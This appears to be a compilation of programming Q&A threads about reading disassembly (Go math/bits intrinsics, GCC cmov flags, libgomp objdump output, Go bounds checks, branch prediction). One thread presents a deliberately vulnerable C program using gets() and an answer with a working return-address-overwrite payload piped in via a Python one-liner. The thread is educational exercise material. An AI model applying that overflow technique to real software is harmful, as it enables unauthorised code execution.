Is math.bits in Go using machine code instructions? - go

The new golang package "math/bits" provides useful functions. The source code shows how the function result are computed.
Are these functions replaced by the corresponding processor OP codes when available?

Yes, as stated in Go 1.9 Release Notes: New bit manipulation package:
Go 1.9 includes a new package, math/bits, with optimized implementations for manipulating bits. On most architectures, functions in this package are additionally recognized by the compiler and treated as intrinsics for additional performance.
Some related / historical github issues:
math/bits: an integer bit twiddling library #18616
proposal: cmd/compile: intrinsicify user defined assembly functions #17373
Provide a builtin for population counting / hamming distance #10757

Yes it does. You can see an example of it working here
first compile this
package main
import (
"fmt"
"math/bits"
)
func count(i uint) {
fmt.Printf("%d has %d length\n", i, bits.Len(i))
}
func main() {
for i := uint(0); i < 100; i++ {
count(i)
}
}
Then look at the disassembly. Note the BSR instruction - Bit Scan Reverse which from the manual: Searches the value in a register or a memory location (second operand) for the most-significant set bit.
0000000000489620 <main.count>:
489620: 64 48 8b 0c 25 f8 ff mov %fs:0xfffffffffffffff8,%rcx
489627: ff ff
489629: 48 3b 61 10 cmp 0x10(%rcx),%rsp
48962d: 0f 86 f2 00 00 00 jbe 489725 <main.count+0x105>
489633: 48 83 ec 78 sub $0x78,%rsp
489637: 48 89 6c 24 70 mov %rbp,0x70(%rsp)
48963c: 48 8d 6c 24 70 lea 0x70(%rsp),%rbp
489641: 48 8b 84 24 80 00 00 mov 0x80(%rsp),%rax
489648: 00
489649: 48 0f bd c8 bsr %rax,%rcx ; **** Bit scan reverse instruction ***
48964d: 48 89 44 24 48 mov %rax,0x48(%rsp)
489652: 48 c7 c0 ff ff ff ff mov $0xffffffffffffffff,%rax
489659: 48 0f 44 c8 cmove %rax,%rcx
48965d: 48 8d 41 01 lea 0x1(%rcx),%rax

Related

Removing CMOV Instructions using GCC-9.2.0 (x86)

I am looking to compile a set of benchmark suites using traditional GCC optimizations (as in using -O2/3) and comparing this with the same benchmark using no cmov instructions. I have seen several posts/websites addressing this issue (all from several years ago and therefore referencing an older version of GCC than 9.2.0). Essentially, the answers from these was to use the following four flags (this is a good summary of everything I've found online):
-fno-if-conversion -fno-if-conversion2 -fno-tree-loop-if-convert -fno-tree-loop-if-convert-stores
Following this advice, I am using the following command to compile my benchmarks (theoretically with no cmov instructions).
g++-9.2.0 -std=c++11 -O2 -g -fno-if-conversion -fno-if-conversion2 -fno-tree-loop-if-convert -fno-tree-loop-if-convert-stores -fno-inline *.C -o bfs-nocmov
However, I am still finding instances where cmov is being used. If I change the optimization flag to -O0 the cmov instructions are not generated, so I am assuming there must be someway to disable this in GCC without modifying the c code/assembly.
Below is a code snippet example of what I am trying to disable (the last instruction is the cmov I am looking to avoid):
int mx = 0;
for (int i=0; i < n; i++)
41bc8a: 45 85 e4 test %r12d,%r12d
41bc8d: 7e 71 jle 41bd00 <_Z11suffixArrayPhi+0xe0>
41bc8f: 41 8d 44 24 ff lea -0x1(%r12),%eax
41bc94: 48 89 df mov %rbx,%rdi
.../suffix/src/ks.C:92
int mx = 0;
41bc97: 31 c9 xor %ecx,%ecx
41bc99: 48 8d 54 03 01 lea 0x1(%rbx,%rax,1),%rdx
41bc9e: 66 90 xchg %ax,%ax
.../suffix/src/ks.C:94
if (s[i] > mx) mx = s[i];
41bca0: 44 0f b6 07 movzbl (%rdi),%r8d
41bca4: 44 39 c1 cmp %r8d,%ecx
41bca7: 41 0f 4c c8 cmovl %r8d,%ecx
Finally, here is the code snippet generated by using -O0. I cannot use any optimization level lower than -O2, and while manually manipulating the code is an option I have a lot of benchmarks I am using so I would like to find a general solution.
for (int i=0; i < n; i++)
c67: 8b 45 e8 mov -0x18(%rbp),%eax
c6a: 3b 45 d4 cmp -0x2c(%rbp),%eax
c6d: 7d 34 jge ca3 <_Z11suffixArrayPhi+0x105>
.../suffix/src/ks.C:94
if (s[i] > mx) mx = s[i];
c6f: 8b 45 e8 mov -0x18(%rbp),%eax
c72: 48 63 d0 movslq %eax,%rdx
c75: 48 8b 45 d8 mov -0x28(%rbp),%rax
c79: 48 01 d0 add %rdx,%rax
c7c: 0f b6 00 movzbl (%rax),%eax
c7f: 0f b6 c0 movzbl %al,%eax
c82: 39 45 e4 cmp %eax,-0x1c(%rbp)
c85: 7d 16 jge c9d <_Z11suffixArrayPhi+0xff>
.../suffix/src/ks.C:94 (discriminator 1)
c87: 8b 45 e8 mov -0x18(%rbp),%eax
c8a: 48 63 d0 movslq %eax,%rdx
c8d: 48 8b 45 d8 mov -0x28(%rbp),%rax
c91: 48 01 d0 add %rdx,%rax
c94: 0f b6 00 movzbl (%rax),%eax
c97: 0f b6 c0 movzbl %al,%eax
c9a: 89 45 e4 mov %eax,-0x1c(%rbp)
If somebody has any advice or direction to look in, it would be much appreciated.

Buffer overflow: overrwrite CH

I have a program that is vulnerable to buffer overflow. The function that is vulnerable takes 2 arguments. The first is a standard 4 bytes. For the second however, the program performs the following:
xor ch, 0
...
cmp dword ptr [ebp+10h], 0F00DB4BE
Now, if I supply 2 different 4 byte argument, as part of my exploit, i.e. ABCDEFGH (assume ABCD is the first argument, EFGH the second), CH becomes G. So naturally I thought about crafting the following (assume ABCD is right):
ABCD\x00\x0d\x00\x00
What happens however, is that nullbutes seem to be ignored! Sending the above results in CH = 0 and CL = 0xd. This happens no matter where I put \x0d i.e.:
ABCD\x0d\x00\x00\x00
ABCD\x00\x0d\x00\x00
ABCD\x00\x00\x0d\x00
ABCD\x00\x00\x00\x0d
all yield that same behavior.
How can I proceed to only overwrite CH while leaving the rest of ECX as null?
EDIT: see my own answer below. The short version is that bash ignores null bytes and it explains, partially, why the exploit didn't work locally. The exact reason can be found here. Thanks to Michael Petch for pointing it out!
Source:
#include <stdio.h>
#include <stdlib.h>
void win(long long arg1, int arg2)
{
if (arg1 != 0x14B4DA55 || arg2 != 0xF00DB4BE)
{
puts("Close, but not quite.");
exit(1);
}
printf("You win!\n");
}
void vuln()
{
char buf[16];
printf("Type something>");
gets(buf);
printf("You typed %s!\n", buf);
}
int main()
{
/* Disable buffering on stdout */
setvbuf(stdout, NULL, _IONBF, 0);
vuln();
return 0;
}
The relevant part of objdump's disassembly of the executable is:
080491c2 <win>:
80491c2: 55 push %ebp
80491c3: 89 e5 mov %esp,%ebp
80491c5: 81 ec 28 01 00 00 sub $0x128,%esp
80491cb: 8b 4d 08 mov 0x8(%ebp),%ecx
80491ce: 89 8d e0 fe ff ff mov %ecx,-0x120(%ebp)
80491d4: 8b 4d 0c mov 0xc(%ebp),%ecx
80491d7: 89 8d e4 fe ff ff mov %ecx,-0x11c(%ebp)
80491dd: 8b 8d e0 fe ff ff mov -0x120(%ebp),%ecx
80491e3: 81 f1 55 da b4 14 xor $0x14b4da55,%ecx
80491e9: 89 c8 mov %ecx,%eax
80491eb: 8b 8d e4 fe ff ff mov -0x11c(%ebp),%ecx
80491f1: 80 f5 00 xor $0x0,%ch
80491f4: 89 ca mov %ecx,%edx
80491f6: 09 d0 or %edx,%eax
80491f8: 85 c0 test %eax,%eax
80491fa: 75 09 jne 8049205 <win+0x43>
80491fc: 81 7d 10 be b4 0d f0 cmpl $0xf00db4be,0x10(%ebp)
8049203: 74 1a je 804921f <win+0x5d>
8049205: 83 ec 0c sub $0xc,%esp
8049208: 68 08 a0 04 08 push $0x804a008
804920d: e8 4e fe ff ff call 8049060 <puts#plt>
8049212: 83 c4 10 add $0x10,%esp
8049215: 83 ec 0c sub $0xc,%esp
8049218: 6a 01 push $0x1
804921a: e8 51 fe ff ff call 8049070 <exit#plt>
804921f: 83 ec 0c sub $0xc,%esp
8049222: 68 1e a0 04 08 push $0x804a01e
8049227: e8 34 fe ff ff call 8049060 <puts#plt>
804922c: 83 c4 10 add $0x10,%esp
804922f: 83 ec 08 sub $0x8,%esp
8049232: 68 27 a0 04 08 push $0x804a027
8049237: 68 29 a0 04 08 push $0x804a029
804923c: e8 5f fe ff ff call 80490a0 <fopen#plt>
8049241: 83 c4 10 add $0x10,%esp
8049244: 89 45 f4 mov %eax,-0xc(%ebp)
8049247: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
804924b: 75 12 jne 804925f <win+0x9d>
804924d: 83 ec 0c sub $0xc,%esp
8049250: 68 34 a0 04 08 push $0x804a034
8049255: e8 06 fe ff ff call 8049060 <puts#plt>
804925a: 83 c4 10 add $0x10,%esp
804925d: eb 31 jmp 8049290 <win+0xce>
804925f: 83 ec 04 sub $0x4,%esp
8049262: ff 75 f4 pushl -0xc(%ebp)
8049265: 68 00 01 00 00 push $0x100
804926a: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049270: 50 push %eax
8049271: e8 da fd ff ff call 8049050 <fgets#plt>
8049276: 83 c4 10 add $0x10,%esp
8049279: 83 ec 08 sub $0x8,%esp
804927c: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049282: 50 push %eax
8049283: 68 86 a0 04 08 push $0x804a086
8049288: e8 a3 fd ff ff call 8049030 <printf#plt>
804928d: 83 c4 10 add $0x10,%esp
8049290: 90 nop
8049291: c9 leave
8049292: c3 ret
08049293 <vuln>:
8049293: 55 push %ebp
8049294: 89 e5 mov %esp,%ebp
8049296: 83 ec 18 sub $0x18,%esp
8049299: 83 ec 0c sub $0xc,%esp
804929c: 68 90 a0 04 08 push $0x804a090
80492a1: e8 8a fd ff ff call 8049030 <printf#plt>
80492a6: 83 c4 10 add $0x10,%esp
80492a9: 83 ec 0c sub $0xc,%esp
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets#plt>
80492b5: 83 c4 10 add $0x10,%esp
80492b8: 83 ec 08 sub $0x8,%esp
80492bb: 8d 45 e8 lea -0x18(%ebp),%eax
80492be: 50 push %eax
80492bf: 68 a0 a0 04 08 push $0x804a0a0
80492c4: e8 67 fd ff ff call 8049030 <printf#plt>
80492c9: 83 c4 10 add $0x10,%esp
80492cc: 90 nop
80492cd: c9 leave
80492ce: c3 ret
080492cf <main>:
80492cf: 8d 4c 24 04 lea 0x4(%esp),%ecx
80492d3: 83 e4 f0 and $0xfffffff0,%esp
80492d6: ff 71 fc pushl -0x4(%ecx)
80492d9: 55 push %ebp
80492da: 89 e5 mov %esp,%ebp
80492dc: 51 push %ecx
80492dd: 83 ec 04 sub $0x4,%esp
80492e0: a1 34 c0 04 08 mov 0x804c034,%eax
80492e5: 6a 00 push $0x0
80492e7: 6a 02 push $0x2
80492e9: 6a 00 push $0x0
80492eb: 50 push %eax
80492ec: e8 9f fd ff ff call 8049090 <setvbuf#plt>
80492f1: 83 c4 10 add $0x10,%esp
80492f4: e8 9a ff ff ff call 8049293 <vuln>
80492f9: b8 00 00 00 00 mov $0x0,%eax
80492fe: 8b 4d fc mov -0x4(%ebp),%ecx
8049301: c9 leave
8049302: 8d 61 fc lea -0x4(%ecx),%esp
8049305: c3 ret
It is unclear why you are hung up on the value in ECX or the xor ch, 0 instruction inside the win function. From the C code it is clear that the check for a win requires that the 64-bit (long long) arg1 to be 0x14B4DA55 and arg2 needs to be 0xF00DB4BE. When that condition is met it will print You win!
We need some kind of buffer exploit that has the capability to execute the win function and make it appear that it is being passed a first argument (64-bit long long) and a 32-bit int as a second parameter.
The most obvious way to pull this off is overrun buf in function vuln that strategically overwrites the return address and replaces it with the address of win. In the disassembled output win is at 0x080491c2. We will need to write 0x080491c2 followed by some dummy value for a return address, followed by the 64-bit value 0x14B4DA55 (same as 0x0000000014B4DA55 ) followed by the 32-bit value 0xF00DB4BE.
The dummy value for a return address is needed because we need to simulate a function call on the stack. We won't be issuing a call instruction so we have to make it appear as if one had been done. The goal is to print You win! whether the program crashes after that isn't relevant.
The return address (win), arg1, and arg2 will have to be stored as bytes in reverse order since the x86 processors are little endian.
The last big question is how many bytes do we have to feed to gets to overrun the buffer to reach the return address? You could use trial and error (bruteforce) to figure this out, but we can look at the disassembly of the call to gets:
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets#plt
LEA is being used to compute the address (Effective Address) of buf on the stack and passing that as the first argument to gets. 0x18 is 24 bytes (decimal). Although buf was defined to be 16 bytes in length the compiler also allocated additional space for alignment purposes. We have to add an additional 4 bytes to account for the fact that the function prologue pushed EBP on the stack. That is a total of 28 bytes (24+4) to reach the position of the return address on the stack.
Using PYTHON to generate the input sequence is common in many tutorials. Embedding NUL(\0) characters in a shell string directly may cause a shell program to prematurely terminate a string at the NUL byte (an issue that people have when using BASH). We can pipe the byte sequence to our program using something like:
python -c 'print "A"*28+"\xc2\x91\x04\x08" \
+"B"*4+"\x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0"' | ./progname
Where progname is the name of your executable. When run it should appear similar to:
Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBUڴ!
You win!
Segmentation fault
Note: the 4 characters making up the return address between the A's and B's are unprintable so they don't appear in the console output but they are still present as well as all the other unprintable characters.
As a limited answer to my own question, specifically regarding why null bytes are ignored:
It seems to be an issue with bash seemingly ignoring nullbytes
Many other of my peers faced the same problem when writing the exploit. It would work on the server but not locally when using gdb for example. Bash would simply disregard the nullbytes and thus \x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0 would be read in as \x55\xda\xb4\x14\xbe\xb4\x0d\xf0. The exact reason why it behaves that way still eludes me but it's a good thing to keep in mind!

Objdump disassemble doesn't match source code

I'm investigating the execution flow of a OpenMP program linked to libgomp. It uses the #pragma omp parallel for. I already know that this construct becomes, among other things, a call to GOMP_parallel function, which is implemented as follows:
void
GOMP_parallel (void (*fn) (void *), void *data,
unsigned num_threads, unsigned int flags)
{
num_threads = gomp_resolve_num_threads (num_threads, 0);
gomp_team_start (fn, data, num_threads, flags, gomp_new_team (num_threads));
fn (data);
ialias_call (GOMP_parallel_end) ();
}
When executing objdump -d on libgomp, GOMP_parallel appears as:
000000000000bc80 <GOMP_parallel##GOMP_4.0>:
bc80: 41 55 push %r13
bc82: 41 54 push %r12
bc84: 41 89 cd mov %ecx,%r13d
bc87: 55 push %rbp
bc88: 53 push %rbx
bc89: 48 89 f5 mov %rsi,%rbp
bc8c: 48 89 fb mov %rdi,%rbx
bc8f: 31 f6 xor %esi,%esi
bc91: 89 d7 mov %edx,%edi
bc93: 48 83 ec 08 sub $0x8,%rsp
bc97: e8 d4 fd ff ff callq ba70 <GOMP_ordered_end##GOMP_1.0+0x70>
bc9c: 41 89 c4 mov %eax,%r12d
bc9f: 89 c7 mov %eax,%edi
bca1: e8 ca 37 00 00 callq f470 <omp_in_final##OMP_3.1+0x2c0>
bca6: 44 89 e9 mov %r13d,%ecx
bca9: 44 89 e2 mov %r12d,%edx
bcac: 48 89 ee mov %rbp,%rsi
bcaf: 48 89 df mov %rbx,%rdi
bcb2: 49 89 c0 mov %rax,%r8
bcb5: e8 16 39 00 00 callq f5d0 <omp_in_final##OMP_3.1+0x420>
bcba: 48 89 ef mov %rbp,%rdi
bcbd: ff d3 callq *%rbx
bcbf: 48 83 c4 08 add $0x8,%rsp
bcc3: 5b pop %rbx
bcc4: 5d pop %rbp
bcc5: 41 5c pop %r12
bcc7: 41 5d pop %r13
bcc9: e9 32 ff ff ff jmpq bc00 <GOMP_parallel_end##GOMP_1.0>
bcce: 66 90 xchg %ax,%ax
First, there isn't any call to GOMP_ordered_end in the source code of GOMP_parallel, for example. Second, that function consists of:
void
GOMP_ordered_end (void)
{
}
According the the objdump output, this function starts at ba00 and finishes at bbbd. How could it have so much code in a function that is empty? By the way, there is comment in the source code of libgomp saying that it should appear only when using the ORDERED construct (as the name suggests), which is not the case of my test.
Finally, the main concern here for me is: why does the source code differ so much from the disassembly? Why, for example, isn't there any mention to gomp_team_start in the assembly?
The system has gcc version 5.4.0
According the the objdump output, this function starts at ba00 and finishes at bbbd.
How could it have so much code in a function that is empty?
The function itself is small but GCC just used some additional bytes to align the next function and store some static data (probly used by other functions in this file). Here's what I see in local ordered.o:
00000000000003b0 <GOMP_ordered_end>:
3b0: f3 c3 repz retq
3b2: 66 66 66 66 66 2e 0f data32 data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
3b9: 1f 84 00 00 00 00 00
First, there isn't any call to GOMP_ordered_end in the source code of GOMP_parallel, for example.
Don't get distracted by GOMP_ordered_end##GOMP_1.0+0x70 mark in assembly code. All it says is that this calls some local library function (for which objdump didn't find any symbol info) which happens to be located 112 bytes after GOMP_ordered_end. This is most likely gomp_resolve_num_threads.
Why, for example, isn't there any mention to gomp_team_start in the assembly?
Hm, this looks pretty much like it:
bcb5: e8 16 39 00 00 callq f5d0 <omp_in_final##OMP_3.1+0x420>

golang: index efficiency of array

It's a simple program.
test environment: debian 8, go 1.4.2
union.go:
package main
import "fmt"
type A struct {
t int32
u int64
}
func test() (total int64) {
a := [...]A{{1, 100}, {2, 3}}
for i := 0; i < 5000000000; i++ {
p := &a[i%2]
total += p.u
}
return
}
func main() {
total := test()
fmt.Println(total)
}
union.c:
#include <stdio.h>
struct A {
int t;
long u;
};
long test()
{
struct A a[2];
a[0].t = 1;
a[0].u = 100;
a[1].t = 2;
a[1].u = 3;
long total = 0;
long i;
for (i = 0; i < 5000000000; i++) {
struct A* p = &a[i % 2];
total += p->u;
}
return total;
}
int main()
{
long total = test();
printf("%ld\n", total);
}
result compare:
go:
257500000000
real 0m9.167s
user 0m9.196s
sys 0m0.012s
C:
257500000000
real 0m3.585s
user 0m3.560s
sys 0m0.008s
It seems that the go compiles lot of weird assembly codes (you could use objdump -D to check it).
For example, why movabs $0x12a05f200,%rbp appears twice?
400c60: 31 c0 xor %eax,%eax
400c62: 48 bd 00 f2 05 2a 01 movabs $0x12a05f200,%rbp
400c69: 00 00 00
400c6c: 48 39 e8 cmp %rbp,%rax
400c6f: 7d 46 jge 400cb7 <main.test+0xb7>
400c71: 48 89 c1 mov %rax,%rcx
400c74: 48 c1 f9 3f sar $0x3f,%rcx
400c78: 48 89 c3 mov %rax,%rbx
400c7b: 48 29 cb sub %rcx,%rbx
400c7e: 48 83 e3 01 and $0x1,%rbx
400c82: 48 01 cb add %rcx,%rbx
400c85: 48 8d 2c 24 lea (%rsp),%rbp
400c89: 48 83 fb 02 cmp $0x2,%rbx
400c8d: 73 2d jae 400cbc <main.test+0xbc>
400c8f: 48 6b db 10 imul $0x10,%rbx,%rbx
400c93: 48 01 dd add %rbx,%rbp
400c96: 48 8b 5d 08 mov 0x8(%rbp),%rbx
400c9a: 48 01 f3 add %rsi,%rbx
400c9d: 48 89 de mov %rbx,%rsi
400ca0: 48 89 5c 24 28 mov %rbx,0x28(%rsp)
400ca5: 48 ff c0 inc %rax
400ca8: 48 bd 00 f2 05 2a 01 movabs $0x12a05f200,%rbp
400caf: 00 00 00
400cb2: 48 39 e8 cmp %rbp,%rax
400cb5: 7c ba jl 400c71 <main.test+0x71>
400cb7: 48 83 c4 20 add $0x20,%rsp
400cbb: c3 retq
400cbc: e8 6f e0 00 00 callq 40ed30 <runtime.panicindex>
400cc1: 0f 0b ud2
...
while the C assembly is more clean:
0000000000400570 <test>:
400570: 48 c7 44 24 e0 64 00 movq $0x64,-0x20(%rsp)
400577: 00 00
400579: 48 c7 44 24 f0 03 00 movq $0x3,-0x10(%rsp)
400580: 00 00
400582: b9 64 00 00 00 mov $0x64,%ecx
400587: 31 d2 xor %edx,%edx
400589: 31 c0 xor %eax,%eax
40058b: 48 be 00 f2 05 2a 01 movabs $0x12a05f200,%rsi
400592: 00 00 00
400595: eb 18 jmp 4005af <test+0x3f>
400597: 66 0f 1f 84 00 00 00 nopw 0x0(%rax,%rax,1)
40059e: 00 00
4005a0: 48 89 d1 mov %rdx,%rcx
4005a3: 83 e1 01 and $0x1,%ecx
4005a6: 48 c1 e1 04 shl $0x4,%rcx
4005aa: 48 8b 4c 0c e0 mov -0x20(%rsp,%rcx,1),%rcx
4005af: 48 83 c2 01 add $0x1,%rdx
4005b3: 48 01 c8 add %rcx,%rax
4005b6: 48 39 f2 cmp %rsi,%rdx
4005b9: 75 e5 jne 4005a0 <test+0x30>
4005bb: f3 c3 repz retq
4005bd: 0f 1f 00 nopl (%rax)
Could somebody explain it? Thanks!
The main difference is the the array bounds checking. In the disassembly dump for the Go program, there is:
400c89: 48 83 fb 02 cmp $0x2,%rbx
400c8d: 73 2d jae 400cbc <main.test+0xbc>
...
400cbc: e8 6f e0 00 00 callq 40ed30 <runtime.panicindex>
400cc1: 0f 0b ud2
So if %rbx is greater than or equal to 2, then it jumps down to a call to runtime.panicindex. Given you're working with an array of size 2, that is clearly the bounds check. You could make the argument that the compiler should be smart enough to skip the bounds check in this particular case where the range of the index can be determined statically, but it seems that it isn't smart enough to do so yet.
While you're seeing a noticeable performance difference for this micro-benchmark, it might be worth considering whether this is actually representative of your actual code. If you're doing other stuff in your loop, the difference is likely to be less noticeable.
And while bounds checking does have a cost, in many cases it is better than the alternative of the program continuing with undefined behaviour.

Why are ternary and logical operators more efficient than if branches?

I stumbled upon this question/answer which mentions that in most languages, logical operators such as:
x == y && doSomething();
can be faster than doing the same thing with an if branch:
if(x == y) {
doSomething();
}
Similarly, it says that the ternary operator:
x = y == z ? 0 : 1
is usually faster than using an if branch:
if(y == z) {
x = 0;
} else {
x = 1;
}
This got me Googling, which led me to this fantastic answer which explains branch prediction.
Basically, what it says is that the CPU operates at very fast speeds, and rather than slowing down to compute every if branch, it tries to guess what outcome will take place and places the appropriate instructions in its pipeline. But if it makes the wrong guess, it will have to back up and recompute the appropriate instructions.
But this still doesn't explain to me why logical operators or the ternary operator are treated differently than if branches. Since the CPU doesn't know the outcome of x == y, shouldn't it still have to guess whether to place the call to doSomething() (and therefore, all of doSomething's code) into its pipeline? And, therefore, back up if its guess was incorrect? Similarly, for the ternary operator, shouldn't the CPU have to guess whether y == z will evaluate to true when determining what to store in x, and back up if its guess was wrong?
I don't understand why if branches are treated any differently by the compiler than any other statement which is conditional. Shouldn't all conditionals be evaluated the same way?
Short answer - it simply isn't. While helping branch prediction could improve you performance - using this as a part a logical statement doesn't change the compiled code.
If you want to help branch prediction use __builtin_expect (for GNU)
To emphasize let's compare the compiler output:
#include <stdio.h>
int main(){
int foo;
scanf("%d", &foo); /*Needed to eliminate optimizations*/
#ifdef IF
if (foo)
printf("Foo!");
#else
foo && printf("Foo!");
#endif
return 0;
}
For gcc -O3 branch.c -DIF
We get:
0000000000400540 <main>:
400540: 48 83 ec 18 sub $0x18,%rsp
400544: 31 c0 xor %eax,%eax
400546: bf 68 06 40 00 mov $0x400668,%edi
40054b: 48 8d 74 24 0c lea 0xc(%rsp),%rsi
400550: e8 e3 fe ff ff callq 400438 <__isoc99_scanf#plt>
400555: 8b 44 24 0c mov 0xc(%rsp),%eax
400559: 85 c0 test %eax,%eax #This is the relevant part
40055b: 74 0c je 400569 <main+0x29>
40055d: bf 6b 06 40 00 mov $0x40066b,%edi
400562: 31 c0 xor %eax,%eax
400564: e8 af fe ff ff callq 400418 <printf#plt>
400569: 31 c0 xor %eax,%eax
40056b: 48 83 c4 18 add $0x18,%rsp
40056f: c3 retq
And for gcc -O3 branch.c
0000000000400540 <main>:
400540: 48 83 ec 18 sub $0x18,%rsp
400544: 31 c0 xor %eax,%eax
400546: bf 68 06 40 00 mov $0x400668,%edi
40054b: 48 8d 74 24 0c lea 0xc(%rsp),%rsi
400550: e8 e3 fe ff ff callq 400438 <__isoc99_scanf#plt>
400555: 8b 44 24 0c mov 0xc(%rsp),%eax
400559: 85 c0 test %eax,%eax
40055b: 74 0c je 400569 <main+0x29>
40055d: bf 6b 06 40 00 mov $0x40066b,%edi
400562: 31 c0 xor %eax,%eax
400564: e8 af fe ff ff callq 400418 <printf#plt>
400569: 31 c0 xor %eax,%eax
40056b: 48 83 c4 18 add $0x18,%rsp
40056f: c3 retq
This is exactly the same code.
The question you linked to measures performance for JAVAScript. Note that there it may be interpreted (since Java script is interpreted or JIT depending on the version) to something different for the two cases.
Anyway JavaScript is not the best for learning about performance.

Resources